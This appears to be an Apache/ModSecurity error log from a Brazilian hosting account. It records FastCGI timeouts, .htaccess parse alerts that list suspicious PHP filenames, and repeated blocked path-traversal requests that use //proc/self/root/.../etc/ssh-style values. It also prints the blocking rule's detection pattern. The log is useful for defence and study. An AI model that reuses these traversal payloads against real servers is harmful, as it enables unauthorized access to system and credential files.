[Thu Mar 19 07:16:17.669795 2026] [core:alert] [pid 31803:tid 140411582465792] [client 57.141.18.46:49634] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 07:16:22.126044 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:16:36.266683 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.228.61:52648] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvNBPu8EFLIOrSqIpuFvwAAAlY"]
[Thu Mar 19 07:16:50.069886 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:16:54.745464 2026] [mime_magic:error] [pid 19093:tid 140411540502272] (70014)End of file found: [client 57.141.18.109:50354] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:17:19.125936 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48056] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:17:24.652747 2026] [core:alert] [pid 19093:tid 140411691570944] [client 57.141.18.92:51458] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:17:29.149903 2026] [core:alert] [pid 26799:tid 140411708356352] [client 57.141.18.2:51076] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:17:46.125781 2026] [proxy_fcgi:error] [pid 19093:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:18:11.129796 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49478] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:18:37.129878 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50206] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:18:45.983854 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.244.43:52644] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvNhV_V7PWP6ixUYl6g3gAAAog"]
[Thu Mar 19 07:19:02.285895 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50838] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:19:25.133817 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51494] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:19:48.157834 2026] [proxy_fcgi:error] [pid 27293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52172] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:19:59.410277 2026] [mime_magic:error] [pid 27293:tid 140411548894976] (70014)End of file found: [client 57.141.18.14:55414] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:20:02.673070 2026] [mime_magic:error] [pid 27403:tid 140411683178240] (70014)End of file found: [client 57.141.18.116:55484] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:20:10.129923 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52784] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:20:34.131979 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53434] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:20:55.812859 2026] [mime_magic:error] [pid 17653:tid 140411716749056] (70014)End of file found: [client 57.141.18.8:56972] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:20:57.121886 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:21:23.129873 2026] [core:alert] [pid 27293:tid 140411658000128] [client 57.141.18.113:57604] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:21:23.129958 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54612] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:21:36.211328 2026] [core:alert] [pid 17653:tid 140411641214720] [client 74.7.243.128:33366] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var
[Thu Mar 19 07:21:48.182692 2026] [core:alert] [pid 27403:tid 140411607643904] [client 57.141.18.108:58332] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:21:50.137802 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55268] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:22:17.141782 2026] [proxy_fcgi:error] [pid 19093:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56118] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:22:19.911911 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:36192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOW_u8EFLIOrSqIpuGrQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:22:20.945476 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:36192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOXPu8EFLIOrSqIpuGrgAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:22:22.954480 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.243.128:58420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOXhkFeYa1D6dYQnDUkwAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:22:27.136620 2026] [mime_magic:error] [pid 19093:tid 140411699963648] (70014)End of file found: [client 57.141.18.19:59498] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:22:32.127870 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.243.128:58420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOaBkFeYa1D6dYQnDUnQAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:22:38.446123 2026] [core:alert] [pid 27403:tid 140411666392832] [client 57.141.18.124:59766] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:22:43.097820 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:22:45.627210 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.243.128:33834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOdf-YZRR_7pZ7nDJyggAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:22:50.095774 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.243.128:35184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOeRkFeYa1D6dYQnDUrgAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:22:53.815580 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:35194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOffu8EFLIOrSqIpuGuwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:22:59.304141 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:35210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOggkwaGbbGflqUZCf1QAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:23:05.527796 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:35336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOifu8EFLIOrSqIpuGwgAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:23:05.743021 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:35336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOifu8EFLIOrSqIpuGwwAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:23:10.125782 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57446] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:23:12.319938 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.243.128:57228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOkF_V7PWP6ixUYl6hsgAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:23:15.412947 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 57.141.18.71:60808] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:23:19.161257 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.243.128:57242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOl_-YZRR_7pZ7nDJyrQAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:23:26.194635 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.243.128:37982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOnv-YZRR_7pZ7nDJysgAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:23:37.121785 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58132] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:23:43.792048 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:33146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOr-yqAr6etmhZHNpIPgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:23:48.434848 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:60044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOtNa6ubjKNq_cu4Yu5wAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
